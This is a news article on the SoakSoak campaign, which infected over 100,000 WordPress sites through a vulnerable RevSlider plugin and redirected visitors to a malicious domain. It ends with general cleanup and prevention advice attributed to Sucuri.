More than 100,000 WordPress websites have been infected with malware after attackers exploited a vulnerability in a popular WordPress plugin called RevSlider. The attack turns the infected WordPress sites into unwilling distributors of yet more malware, this time aimed at visitors to the sites.
The malware campaign has been dubbed SoakSoak because it causes some infected websites to redirect visitors to a malicious website at soaksoak.ru. In an attempt to curb the infections, Google has blacklisted over 11,000 affected WordPress domains, according to Menifee, California-based security company Sucuri.
MORE: Best PC Antivirus Software 2014
This SoakSoak campaign works by scanning WordPress websites, looking for those using outdated versions of the RevSlider plugin. Older editions of RevSlider have a known vulnerability that makes them vulnerable to a Local File Inclusion attack, in which an attacker remotely affects a file. The attackers alter the swfobject.js file found in WordPress sites by adding malicious code that causes site visitors to be redirected to the soaksoak.ru site.
RevSlider is a premium WordPress plugin that is occasionally bundled in with other WordPress themes; some site and blog operators might not even know they have it, while others might not want to pay more money to update it. Both factors are reasons SoakSoak has spread so quickly and infected so many WordPress sites.
Sucuri has a free tool that site administrators can use to check their sites for SoakSoak and other malware.
Cleaning up an infected WordPress site is possible, but can be complicated. Administrators first have to replace their sites' swfobject.js and template-loader.php files to versions without the malicious code. To protect themselves from being reinfected, users should also pay to update, or otherwise get rid of, RevSlider, then set up a website firewall.
"Some users are clearing infections and getting reinfected within minutes, and the reason is because of the complex nature of the payloads and improper cleaning efforts," the Securi blog post warns.